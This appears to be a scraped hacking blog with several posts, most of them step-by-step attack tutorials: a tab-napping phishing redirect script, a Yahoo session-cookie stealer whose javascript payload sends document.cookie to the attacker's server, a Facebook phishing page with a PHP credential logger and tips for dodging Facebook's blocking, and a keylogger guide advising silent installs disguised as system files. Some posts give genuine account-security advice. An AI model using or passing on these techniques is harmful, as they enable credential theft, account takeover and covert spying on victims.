HOW TO SETUP A TAB-NAPPING SCRIPT

Tab napping is a type of  phishing scam that does not require a victim to click on any url so that he / she is redirect you to a  phishing site . Instead it relies on the fact that a lot of people use tabbed browsing (Opening multiple tabs while browsing). In a tab napping scam, one of your inactive tabs is automatically replaced by with a new tab without your knowledge. 

To know more about tab Napping, you can check my earlier article here

How to setup a Tab Napping Script

1. Create an Ordinary phisher

• First of all, you need to prepare a normal traditional phisher. In this tutorial, I will assume that you already know how to create a phishing page. If you don't know how, then go through my earlier tutorial on how to make a phisher .

2. Install the Script

• Download the Tab Napping script here
• Open the text file containing the script with a text editor like Notepad and search for the lines below;

timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect =setInterval("location.href='http://username.site.com/fakepage.htm'",10000);

• Now in the above script, replace http://username.site.com/fakepage.htm with your phishing url

Note that 10000 is the default time in milliseconds, that it will take before the victim's idle tab automatically redirects to your phishing page. Therefore you can modify the idle time too.. 

10000 milliseconds = 10 seconds

• After you have edited the script, copy and paste it into the HTML of your site or blogger site

Thats it! your trap is set man!!! :xD

Read More | comments

TIPS ON HOW TO SECURE YOUR FACEBOOK ACCOUNT

Getting hacked is one of the worst nightmares one can ever have (Atleast i have never been through one :P) especially when your facebook account acts as a login key to third party web accounts. It means, ''multiple accounts compromised''. And not only that, the hacker might have a personal deed and may decide to pull a prank on your friends or even worse. I personally know how easy it is to hack into any web account, that is facebook inclusive, and on the other hand, i also know how easy it can be to protect yourself :D

Below are a few TIPS to help you secure your facebook account.

1.  Enable secure HTTPS connection

HTTP connection is totally outdated. It can easily be tapped or intercepted by a hacker and is extremely vulnerable to attack. As a result, Facebook now offers the HTTPS connection to ensure that all the data submitted from your computer to the Facebook server is completely encrypted. That way, even if there is somebody (hacker)  in the middle who taps your connection, all that person gets is gibberish data that he cant even understand. You can enable HTTPS from your facebook's account settings.

2.Create a strong password for authentication

No matter how secrete your password is, it can easily be broken by brute-force, that is if you choose to use a short and simple password. If you don’t have a strong password to protect your account, then whatever security guides that you apply wont do you any good. The key here is to have a long and complicated password where complexity is the combination of lower case, upper case, numeric and special characters like symbols. for example..
.  

2$k/Gp@?H$y8rQ? 

A hacker would easily give up on such a password as it would take him ages to brute-force. So there you have it,. 

• DO NOT use a password that has a straight forward meaning (that can be found in the dictionary)
• DO NOT use a phone number as a password
• DO NOT use your boyfriend or girlfriend's name as a password,. no matter how much you love them or else it'll easily be broken down.:P

3. Enable login notification

Enabling the login notification will keep you notified when somebody logs in to your account without your permission.. So you can immediately kick them out fast and set a new password so that they can never login again. This is an extremely good feature which can be enabled for both email and mobile SMS.

4. One Time Password in login approval

One Time Password - is a two factor authentication method where you can enable all logins from unknown devices to use One Time Password,.. so as to ensure that only you can login from an unknown device. By making use of this feature, there is only one way a hacker can use to get your Facebook identity which is by stealing your recognised device and that is your computer or mobile phone lol.

5. Logging out from Facebook

Logging out from facebook is the easiest way of securing your account but it is the action that most people forget to perform. Whenever most people are done with checking and replying messages in Facebook, they just close the web browser and walk away from the computer assuming that the session is logged out. Unfortunately, that is a big gamble and not all the web browsers work the same. Some still retain your previous session even though the web browser is closed. Remember to logout.

6. Beware of Keyloggers

A keylogger - is a spyware tool that runs secretly in the system and records each and every keystroke on the user's keyboard. In other words, whatever you type on the keyboard is going to be saved as logs, which can later be viewed with a log viewer or sent to the hacker's email address via your network. And not only keystroke capturing, keyloggers have additional features like,.. screenshot capturing, secrete webcaming & web activity logging. There are two types of keyloggers, Software and hardware keyloggers.

• Software keyloggers are usually downloaded as file attachments from the web, a single click on that file executes the keylogger.
• Hardware keyloggers are more like usb disks, they are plugged in manually onto the victim's computer via usb port. The most common place to find hardware keyloggers are Internet cafes or a cyber cafe rather.

How to Avoid and Bypass keyloggers

• Update your antivirus regularly though this will only apply to a software keylogger as hardware keyloggers are hardly detected by antivirus :P
• Develop a habit of using an onscreen keyboard whenever you want to enter a password, this will bypass any keylogger installed on your system. To access the onscreen keyboard, simply go to Start->Run then in the prompt box, type osk.exe and hit Enter! the keyboard will appear on your screen, then use the mouse to enter your password.
• Another way to bypass a keylogger is to fool it by shuffling your password when entering it lol. What i mean is...for example if your password is ABCDEF, when entering it, first type the letters ''AB'' and ''F'' then put the mouse cursor between ''B'' and ''F'' and type the letters ''C'' and ''E'' then finally put your mouse cursor between ''C'' and ''E'' and punch the letter D. ... haha lol then whoever installed that keylogger will never get your password correct. The aim is to enter the password without following the correct order.

7. Beware of Phishing

Phishing is a method of getting a user's credentials, i.e username and password with the help of a fake login page. You can find out more about phishing in my earlier article here, To protect yourself from phishing, always check your URL or your current page address in your browser's address bar to make sure you are on the real or correct login page. And please NEVER submit your login details on any third party site apart from facebook. Stay alert!!

8. Beware of HACK the hacker tools
These are simple tools that are developed with a quite convincing interface of hacking anybody's password with a single click. e.g facebook hacker pro, 007 facebook hacker, gmail password cracker, yahoo password cracker e.t.c.  These contain two main parts, the noob hacker's part, and the victim's part. The noob hacker is prompted to enter his username & password followed by his victim's username ,.. with the belief that when the noob hacker hits Enter,. he will get his victim's password revealed,.. Well the bad news is that these tools are nothing but trojans.

What this tool will do is,.. instead it will get whatever was imputed or typed on the noob hacker's part (username and password) & send it silently to the real HACKER's email address via a network connection, hence the noob hacker has been HACKED!!! :P:P:P

Therefore if you have been searching for a software on the internet to hack your friend with, i suggest that you stop now or you will only get yourself hacked. For now it is impossible to hack into facebook or any other account with a single click, the only way is by doing the manual work yourself.

9. Update your System Regularly

Updating your system regularly is one of the effective ways to get rid of malicious tools or spyware programs that may have patched up your system. Remember, there is nothing like 100% secure, change your passwords like a ladies underwear. Update your antivirus and do a regular scan. But please do not trust your antivirus too much lol. Some of these tool are deadly and completely FUD (Fully Undetectable). Just combine with the above knowledge and you are safe :D:D:D

Read More | comments

HOW TO HACK YAHOO ACCOUNT via SESSION COOKIES | SESSION ID's | STEALING YOUR VICTIM's COOKIES

What are Session ID's or Session Cookies??

A session ID is a unique piece of string that is generated when a user signs into any account. One copy is stored on the server and the other copy is saved onto the user's browser as a cookie. Both copies are matched everytime a user does anything to his or her account. This session ID's are destroyed immidiately when the user clicks on the ''sign out'' button.

To view your session cookies, Just login to yahoo.com. Type in browser; 

 javascript:alert(document.cookie);

You will get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

These are the same piece of strings that an attacker (Hacker) can attempt to steal by tricking his victim into running a piece of code on his browser (Victim's browser). Once an attacker gains access to the victim's cookies, he will be able to automatically login to the victim's account without the need to provide a username and password, hence a hacked session.. :P:P:P

This is a very rare type of a cyber attack because when the victim clicks on the ''sign out'' button, the cookie gets destroyed and hence the attacker gets signed out.

In the case of yahoo, the hacker doesnt get signed out even when the user clicks the ''sign out'' button. Instead yahoo destoys the sesseion automatically after atleast 24hours. But when the user refreshes the windows in yahoo account, he gets sessions for the next 24 hours. This means that an attacker can do the same by refreshing the window in every 24 hours, thereby getting access the victim's account for a lifetime :D

HOW TO STEAL SESSION ID's

1. Download the cookie stealer here

2. Sign up for a free account at any php enabled webhosting site. I advise you to choose www.my3gb.com

3. Login to your my3gb file manager and upload the four files  that you have just downloaded. Then Create an empty directory and rename it as ''cookies'' as shown in the image below;

• Yahoo.php is basically cookie stealing script, hacked.php executes the stolen cookies in browser. and the Stolen cookies get stored in directory ''cookies''

4. Now give the code below to your victim to run in his browser when he is logged in to his yahoo account.

javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 

Trick your victim into entering and running the above code into his browser. How you will trick your victim will totally depend on your creativity.

5. After you are sure that your victim has run the code in his browser, go to your my3gb file manager and open ''hacked.php''. The password is explore

6. Enter the password explore and click ''login'', then you will find the Username to the yahoo account of the hacked session... as shown below;

7. Click on the Username and its game Over!!!,.. it will take you straight into the victim's email account without asking for the password. :D:D:D

• It doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session. Also note that the script will not work in latest versions of google chrome.

Enjoy.:D

Read More | comments

HOW TO MAKE A PHISHER | HACK FACEBOOK, GMAIL e.tc | TUTORIAL

WHAT IS PHISHING?
Phishing is a technique or a way of attempting to acquire sensitive or confidential information such as usernames, passwords, and credit card details by false pretence as a trustworthy entity in an electronic communication. This is done with the help of a phisher.


WHAT IS A PHISHER?
A phisher is something that looks exactly like an Original login page (fake page), that writes the victim's login data (Username and Password) to a specific file, or does whatever you want so long as you get access to the victim's login data.
Here is an example of a fake facebook login page (phisher)

HOW TO MAKE A PHISHER?
As the saying goes:

• Dont give plenty of FISH to your friend,. Instead, you should teach him how to PHISH

Therefore, instead of  just giving you the download link to the already made phishing page,.. Am going to teach you how to make your own phishing page. Well, at the end of this tutorial, i will put a download link to my already made phishing pages but first you have to learn how to make your own phisher :D

To create a successful phisher, all you need is a PHP enabled site , Notepad on your computer and a brain.
You can download Notepad v5.9++ here

Here is a list of php enabled free hosting sites:

• 110mb - http://110mb.com  
• Ripway - http://ripway.com
• SuperFreeHost - http://superfreehost.info
• Freehostia - http://freehostia.com
• Freeweb7 - http://freeweb7.com
• t35 - http://t35.com
• Awardspace - http://awardspace.com
• PHPNet - http://phpnet.us
• Free Web Hosting Pro - http://freewebhostingpro.com
• ProHosts - http://prohosts.org
• FreeZoka - http://www.freezoka.com/
• 000webhost - http://000webhost.com/
• AtSpace - http://atspace.com
• My3gb - http://my3gb.com

In this tutorial am going to fucus mainly on how to prepare a phishing attack on facebook, am going to use Mozilla firefox as the browser and http://my3gb.com as the hosting site, its much easier.

STEP 1 -Creating the fake page

• Go to facebook's login page http://www.facebook.com
• On the top left corner of your Firefox browser, Click File ->Save page As and save your page name as facebook.html
• Open facebook.html Using Notepad and search for the word ''action''

You will find it on a line that looks like this;

class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form"

• Now change the method to ''get'' and action to ''login.php'' so that you will have something that looks like this;

class="menu_login_container"><form method="get" action="login.php" id="login_form"

 STEP 2- Preparing the php script

• To Create a php file, simply pasting the code below into your notepad. Then save it as login.php
  

------------------------------------------------------------------------------
<?php
header("Location: http://facebook.com/login.php ");
$handle = fopen("noobs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

------------------------------------------------------------------------------

 Note that in the above script, ''phished.txt'' is the file on which all hacked usernames and passwords will be saved and ''https://facebook.com/login.php'' is the Original facebook url where your victim will be redircted to after clicking the login button on your fake page. But at the moment facebook has tightened its security where by your victim will get notified of a phishing attack and would therefore be prompted to change his password right after arriving from a phishing page.

To avoid this, you should redirect your victim to any other url which is not of facebook by replacing  https://facebook.com/login.php with any url. Choosing the url to redirect your victim to will all depend on the trick that you will use against your victim in the whole phishing proccess.

Please also note that this part is mainly for facebook , its ok with several other sites like gmail, hotmail e.t.c your victim will not get a warning message, including mobile facebook (http://m.facebook.com).

STEP 3- Create File where to save hacked passwords

• Create an empty text file using notepad and rename it as phished

Note that when creating the text file, there is no need of renaming it as phished.txt because the fact that you will save it as a text file is enough to make it bear the extension of txt

Now you have 3 files so far;

1. facebook.html
2. login.php
3. phished.txt

 STEP 5- Uploading the 3 files

Now go to http://my3gb.com and sign up for a free hosting account the upload the 3 files as shown below

 

If your phisher has successfully been made, any email address and passwords that are typed on your fake page will be saved on the ''phished.txt'' file as shown in the image below

The link to your phishing page will therefore be; 

www.yourusername.my3gb.com/facebook.html

NOTE THAT:

1. No One will be so dumb to click on such a link
2. Facebook will automaticaly block your phishing url from being posted on facebook

To overcome the above sitiuation you need to rename your phishing link using a ''dot.tk'' domain. To be able to do this, go to www.dot.tk and register,. After that, login to your account and click on ''Add a new free domain now'' and follow the rest of the steps. 

Your dot.tk domain name will look like this,... www.anyname.tk , any clicks on this link will be fowarded to your fake facebook page.

The good part is that..

• you can rename the phishing link to suite your victim's curiosity and there making it difficult for him to notice any phisher
• Your phisher will NOT be detected and blocked by facebook,..so you are free to post it or send it to a freind on facebook via inbox.

Hope you enjoyed the tutorial,. you can now Download some of the already made phishing pages.

Download Phishing Pages rar

Read More | comments (2)

FUNNY TRICK TO HACK FACEBOOK

You can actually impress someone with your hacking skills by using this trick of hacking facebook. The funny part is that this trick will not actually hack into facebook or do any privacy violation to yo victim's account.  This is just a simple javascript trick but the other person witnessing it will surely believe you as a hacker. what you have to do is run this javascript in your address bar of your web browser.

• Copy and paste the java script into the address bar

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

With this script, You can edit content of any webpage including facebook,twitter,gmail etc.For example, see the pic below(click to zoom)

HOW THIS TRICK WORKS?

This is a javascript code on the the browser side.It is temporary and the changes will be gone once you refresh the webpage.

The javascript code JavaScript:document.body.contentEditable=’true’; makes the website editable in your browser.

The code document.designMode=’on’ tells the browser to turn the designmode on

The code void 0 tells the browser not to show any error

So, enjoy this funny trick to hack facebook

NOTE:-The javascript code doesn’t work in the latest version of Google Chrome Browser .. :P

Read More | comments

HOW TO DISSABLE FACEBOOK PHOTO THEATRE MODE

Some Facebook users are not happy with the new feature called ‘Theater Mode’, it displays a black box around the photo which prevents users from interacting with the rest of the site.
You can simply open the photo in new tab or remove the “&theater” text from the end of the URL to get rid of the Facebook theater mode; another trick is that you can refresh the page to get back the default photo viewer.

If you want to disable the theater mode permanently, here is the step by step instructions:

1. Solution for ‘Chrome’ users:

If you’re using Facebook in your Chrome browser then go to :
http://userscripts.org/scripts/show/96773  and there click on install to install the ‘Facebook Photo Theater Killer’
A pop-up will ask you to start the installation, just click the ‘Install’ button. (Don’t worry it is safe)

That’s it ! Now whenever you open photos in Facebook, it will show you all your photos in a normal photo viewer.

2. Solution for ‘Firefox’ users:

If you’re using Facebook on your Firefox browser then you need to install ‘Greasemonkey’ Add-on.

Install Greasemonkey: https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/

Now go to : http://userscripts.org/scripts/show/96773  & click the ‘Install’ button to install the ‘Facebook Photo Theater Killer’ script.

That’s it ! Now whenever you open photos in Facebook, it will show you all your photos in a normal photo viewer.

How to uninstall the script ?

If you want to uninstall the ‘Facebook Photo Theater Killer’ script from the Chrome then simply go to ‘Tools’ & select the ‘Extensions where you can disable or uninstall the script easily. You can also uninstall this script from Mozilla firefox browser. Simply, go to ‘Tools’ & select the ‘Add-ons’,. then go to ‘User Script’ tab & there you can easily disable or uninstall the script.

• If you want to uninstall the Greasemonkey add-on as well then go to ‘Extensions’ tab where you can disable or uninstall the add-on easily.

Enjoy!!!...

Read More | comments

HOW TO HACK FACEBOOK | GMAIL ... etc USING RAPZO KEYLOGGER

 Just like any other keylogger,.. Rapzo logger is a keystroke recorder that captures user's activity and saves it to an encrypted log file which can be viewed remotly via email. To hack using this tool, follow the following steps:

1. Download Rapzo Keylogger
2. Make sure that you have microsoft net framework installed on your computer.
3. Extract the Rapzo keylogger archive and run RapZo logger.exe
4. In the Mail setup tab, check on Enable to highlight the mail setup options as shown below

 

     5. Enter your email adress where it says ''Enter Username'' and your password where it says 

         ''Enter Password''... Take it easy, you wont get hacked,. if you want to be very sure, you can

         create another account just for hacking purpose at gmail.com .

     6. Then enter the same email address on ''Logs send To'' and click on Test Me to verify if your 

         email address is working & that your logs can go through.

     7. Now Click on the Options tab on top and check on your desired options as shown below:

• I recomend that you should NOT check on fake error as this may alert your victim. The habbit of creating fake errors has been famously known, so i personally dont advise people to do that. Instead just drop a sillent install on your victim.

     8. After that, go back to the Mail Setup tab, and click on Build to create ''server.exe'' file and
         send it to your victim.

NOTE THAT

Whenever you want to hack remotly with keyloggers, RATS, or other spyware programs, please avoid sending out server files with names like server.exe, install.exe...... e.t.c nowadays noobs are smart, most of them know exactly what kind of actions these files perfom. Instead you should always try to rename your server file with something similar to a system file name like explore.exe, taskmngr.exe, taskhost.exe,.. then bind it to any file, this way, your victim will have a hard time identifying the server file once it gets installed onto his computer.

DOWNLOAD

http://www.mediafire.com/?ghfx7hg9o8gm07n

Read More | comments

HOW TO PREVENT FACEBOOK HACKING

 Facebook is a social website that gives people the power to share and make the world more open and connected. For its growing popularity, hackers have turned their attention to Facebook and its applications. It is very important for all Facebook account holders to know some tricks to prevent hacking.

•  Strong Password

The first and foremost important trick to prevent hacking is to make Strong Password. You can make strong password by using both uppercase and lowercase letters as well as numbers and symbols. Make it sure to compose a new password with 8 letters at least. Never include your personal information like name or date of birth or home address etc. Change your password once a month.

• Protect Your Computer from Virus and Spyware

Do so to protect your personal information stored in your computer. Spyware and virus can steal your confidential information like passwords, bank information and important documents by sending them to hackers. If you use a café computer or of your friend then make it sure to logout properly and never choose the option to Remember Me.Many Keyloggers, RATs (Remote Administration Tools) have become quite wide spread therefore it is also a must to have a good Antivirus like "Avira"

• Tweak Privacy Settings

Lots of working is being done to make Facebook safer but still there are many chances of account hacking. You can prevent hacking by controlling the information visible to the public. More information you allow the people to see more will be the chances of hacking. Don’t post your picture in your profile as hackers can save the image and post on somewhere else. Don’t put your pictures on internet as it makes people curious to see them.

• Be Careful While Playing Applications

Don’t be crazy over different Facebook applications. It can be really addictive if your other friends are also playing the same applications. Installing these applications, you allow the creators of these applications to access your computer. You are advised to make a spare account on facebook to enjoy its applications and protect your personal information from hacking.

• Use Mozila Firefox/Chrome Web Browser

Firefox claims to stop spywares from entering your computers so switch to this Web Browser from old one.Chrome being a little new to the web industry has lesser vulnerabilities ad its simplicity has always been the key to their protection.I would definitely recommend chrome for personal usages

Read More | comments

TAB NAPPING

An insecurity expert on Mozilla's Firefox web browser team has warned about a form of an advansed phishing attack also known as 'tab napping'.

•  WAT IS TAB NAPPING?

  Unlike the traditional phishing that relies on getting users to click through on a URL that redirect to the phishing site and reveal their user credential, Tab napping relies on a fact that most people use tabbed browsing (Openning multiple tabs while browsing)

• HOW DOES TAB NAPPING WORK?. 

During a tab napping attack, One of the inactive tabs is replaced by a phishing page without the user's knowladge. For example one of your inactive tab in which you have opened your facebook account will be automatically replaced with the phishing login page that looks exactly like that of facebook and you will be asked to enter your Username and password. Once these details are entered, they will be sent to the hacker & you will be redirected to the Original facebook

•  HOW TO PREVENT THIS ATTACK?

Tab napping always takes advantage the user's assumption that a tabbed web page stays the same when other Internet services are being accessed. Therefore to protect yourself from this type of an attack, you always have to;

1. Log out & close the tab when it is unusable
2. Always Check the url when returning from another tab, make sure it is on secure connection (https://site.com)
3. Close & open a new tab if u notice anything unussual about the url 
4. Format the habit of openning multiple tabs unnecessarily when browsing the web

Read More | comments

HOW TO POST EMPTY STATUS ON FACEBOOK

It is rather wierd but a fact that you can now post an empty status on facebook by simply using any of the following methods.

Method 1

As you are logged in to your facebook account ;

• Go to the update status field
• Hold the Alt key and type 0173
• Realease the Alt key and post.

Method 2

• Go to update status field
• Type @[2:2: ]
• Then post it

Read More | comments